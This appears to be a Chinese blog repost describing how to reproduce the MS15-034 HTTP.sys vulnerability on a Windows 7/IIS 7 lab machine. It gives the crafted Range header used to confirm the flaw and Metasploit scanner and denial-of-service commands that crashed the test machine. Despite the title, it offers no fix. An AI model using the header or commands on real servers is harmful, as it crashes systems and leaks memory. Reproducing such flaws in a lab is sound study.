大家好,很高兴再次与大家见面,我是你们的朋友全栈君。
漏洞描述:Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可以在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。
复现环境:Windows 7 + IIS 7
漏洞确认:访问IIS界面,使用Burp Suite抓包,发送到Repeater中,在HTTP请求头中加入如下字段:Range: bytes=18-18446744073709551615,返回416状态码。
验证漏洞的方法:use auxiliary/scanner/http/ms15_034_http_sys_memory_dump,set rhosts 192.168.1.200,run。
利用漏洞的方法:use auxiliary/dos/http/ms15_034_ulonglongadd,set rhosts 192.168.1.200,set threads 10,run。
实验电脑已经蓝屏。
发布者:全栈程序员栈长,转载请注明出处:https://www.php.cn/link/ad59ae2c6077196b68ff0c94a09fed73
以上就是HTTP.sys远程代码执行漏洞修复的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号